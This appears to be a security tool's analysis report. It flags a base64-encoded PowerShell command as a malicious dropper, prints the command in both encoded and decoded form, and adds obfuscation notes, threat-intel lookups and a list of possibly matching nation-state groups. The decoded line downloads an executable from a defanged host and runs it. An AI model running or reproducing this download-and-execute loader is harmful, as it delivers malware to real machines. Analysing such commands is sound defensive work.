Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader.
powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBjAGQAbgAuAHMAdABhAGcAZQAyAC0AZAByAG8AcABbAC4AXQB4AHkAegAvAHMAdgBjAC4AZQB4AGUAIgAsACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB2AGMALgBlAHgAZQAiACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdgBjAC4AZQB4AGUAIgA=
Uses PowerShell to execute a base64-encoded PowerShell payload. The payload is obfuscated (1 decode layer); see the decoded content below.
The command leverages Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute. The payload uses base64-utf16le encoding — a common obfuscation technique to bypass signature-based detection and inline script-block logging.
1 network indicator was extracted (0 IPs, 1 URL); it returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
$c = New-Object Net.WebClient; $c.DownloadFile("http://cdn.stage2-drop[.]xyz/svc.exe","C:\ProgramData\svc.exe"); Start-Process "C:\ProgramData\svc.exe"
All indicators appear clean across queried sources.
Powershell.exe is a task-based command-line shell built on .NET.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.